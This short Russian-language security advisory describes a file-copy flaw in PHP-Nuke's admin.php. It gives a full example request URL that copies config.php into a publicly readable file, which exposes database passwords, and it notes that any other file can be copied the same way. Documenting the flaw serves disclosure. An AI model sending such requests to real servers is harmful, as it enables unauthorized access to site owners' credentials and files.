Уязвимость защиты в PHP-Nuke позволяет удаленному злоумышленнику копировать и перезаписывать файлы на сервере.
Пример:
http://www.example.net/admin.php?upload=1&file= config.php&file_name=hacked.txt&wdir=/images/
&userfile=config.php&userfile_name=hacked.txt
После чего создастся файл: http://www.example.net/images/hacked.txt
В котором вы сможете увидеть содержимое config.php со всеми паролями к базе данных. Этим способом может быть скопирован любой другой файл.
